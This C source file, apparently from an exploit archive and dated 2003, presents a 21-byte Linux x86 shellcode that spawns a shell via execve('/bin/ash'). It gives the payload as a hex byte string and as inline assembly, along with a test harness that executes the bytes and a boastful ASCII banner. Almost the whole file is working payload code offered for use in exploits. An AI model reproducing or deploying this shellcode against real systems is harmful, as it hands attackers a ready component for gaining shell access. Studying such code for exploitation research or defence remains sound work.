21 byte execve("/bin/ash",0,0); shellcode for the Linux x86 architecture.
4f10a4f74dae1b5899ad95a596246c4e3188c818647cd9764035b95d4b2b1a8d
/*
* Fri Aug 29 16:29:38 CEST 2003
*
* 21 byte execve("/bin/ash",0,0); shellcode for linux x86
* by zasta (zasta@darkircop.org)
*
* no assumptions should work under all circumstances
* bash has problems with null argv so we use ash
*
* can be made shorter by cp /bin/ash ./a and fixing the push
* well there are tons of ways to make shorter shellcodes
* for example having /bin/ash\0 somewhere in memory and just "hardcoding"
* the addr in ebx but this is just a generic example of a versatile
* short shellcode
*
*
* greetz: sorbo, #darkircop@irc.darkircop.org
* daphiel & m00kie (hope your honeymoon was allright... male kids!!!)
* hello to s0lar!!
*
*
* have fun!
*
*/
#include <unistd.h>
#include <stdio.h>
char shellcode[] =
"\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
"\x2f\x61\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\xcd\x80";
void code() {
__asm__("
xor %ecx,%ecx
mul %ecx
addb $0xb,%al
push %edx
push $0x6873612f
push $0x6e69622f
mov %esp,%ebx
int $0x80
");
}
/* lets l00k l33t w00t */
void banner() {
printf("execve(\"/bin/ash\",0,0); shellcode %d bytes (short enough? ;)\n"
"============================================================\n\n"
" by\n"
" _\n"
" ______ _ ___| |_ __ _\n"
" |_ / _` / __| __/ _` |\n"
" / / (_| \\__ \\ || (_| |\n"
" /___\\__,_|___/\\__\\__,_|\n"
"\t\tzasta@darkricop.org\n\n"
" the first italian hackgirl\n"
" ph34r I own even acidburn\n\n\n"
,strlen(shellcode));
}
int main(int argc, char *argv[]) {
int opt;
void (*ptr)() = (void(*)()) &shellcode[0];
while ((opt = getopt(argc, argv,"ahs")) != EOF) {
switch(opt) {
default:
case 'h':
printf( "Usage: %s <opts>\n"
"-h\tThis lame message\n"
"-a\tLaunch asm code\n"
"-s\tLaunch hex code\n",argv[0]);
exit(0);
case 'a':
banner();
code();
exit(0); /* unreach if all goes well */
case 's':
banner();
(*ptr)();
exit(0); /* ditto */
}
}
/* default just launch our hex code */
banner();
(*ptr)();
exit(0); /* guess the comment */
}